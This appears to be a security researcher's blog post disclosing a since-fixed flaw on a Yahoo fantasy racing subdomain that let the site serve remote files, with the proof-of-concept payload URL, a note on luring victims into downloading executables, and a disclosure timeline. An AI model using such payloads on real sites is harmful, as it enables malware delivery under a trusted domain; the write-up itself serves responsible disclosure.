Hello, Namaste, Salam,Olá, Здравствуйте, Hola, Bonjour.
Introduction:-
Today I will share strange vulnerability which caught my attention, and I’m about to bring it to yours. No one gave it a fancy name, there were no press releases. It's simple bug thought.
The purpose of this blog is to show that some bugs can be discovered very easily with a little thinking :)
POC:-
At the outset, I was attempting to find a RFD bug. I didn't found that, though I landed somewhere else in heaven.
I was testing one of the yahoo sub-domain racing fantasysports. In it, they have a 'Schedule & Previews' section to preview the race. While checking this Preview function, I came to know .pdf file will appear to end users while checking preview of race. This reflected file caught my attention.
I started fiddling with it. Then a mischievous thought occurred to me that what if I can download or call remote file inside yahoo domain?
The Next question is:-
Answer is simple.
The URL of Preview_1.pdf file reflection was
http://racing.fantasysports.yahoo.com/auto/fanballguidepdf/Preview_1.pdf?file=preview&race=1
Now I had to call or download remote URL files to yahoo domain, so I simply replaced Preview_1.pdf with another domain with appending malicious file.
i.e. Replacing Preview_1.pdf to http://www.7-zip.org/a/7z1506.exe [say malicious file]
(As per Yahoo's policy you should minimize the mayhem.) Hence I selected simple .exe zip file from 7-zip.org domain for my POC.
So my final payload was:-
http://racing.fantasysports.yahoo.com/auto/fanballguidepdf/http://www.7-zip.org/a/7z1506.exe?file=preview&race=5
I hit enter and BOOM.
So I was able to download or call other domain files from yahoo domain.
What is the problem ?
Yahoo calls a remote URL + ANY Files inside their domain making this attack really worse. The attacker can send this URL to victim, once clicked the victim’s machine can be easily compromised.
How they fixed it:-
1] Preview feature disabled.
2] The vulnerable URL now shows below error.
Video POC:-
After I reported this bug to Yahoo Security Team, they rewarded me with Swag stating that it's a RFD Bug. To which I dropped them a mail, describing the difference between RFD and my bug.
Thanks to @dsopas he knows what I mean ;)
They reverted me back as below:-
To which, they said – It is Open Redirect bug. Again, I described the difference between Open Redirect and the reported bug.
In the end, they agreed to my claim that it was neither a RFD nor an open redirect attack but a new attack vector submitted by me. The cold war ended, though they retain their decision on "SWAG"
Yahoo Security Team included me in their Hall Of Fame List and rewarded me with SWAG
Time-Line:
Vulnerability timeline:
Aug 31, 2015 : Reported to Yahoo Security Team
Sep 01, 2015 : Received initial reply from YahooSecurity Team. Report Triaged
Feb 02, 2016 : YahooSecurity Team Resolved the bug. And told me to wait for bounty decision.
Feb 22, 2016 : Swag rewarded stating that its RFD.
Feb 22, 2016 : Explained them difference between RFD and my reported bug.
Mar 08, 2016 : They confirmed its not RFD, and reverted me stating that its Open Redirect Bug.
Mar 08, 2016 : Explained difference between my reported bug and Open Redirect bug.
Mar 11, 2016 : They retain their decision on "SWAG"
Mar 27, 2016 : Public responsible disclosure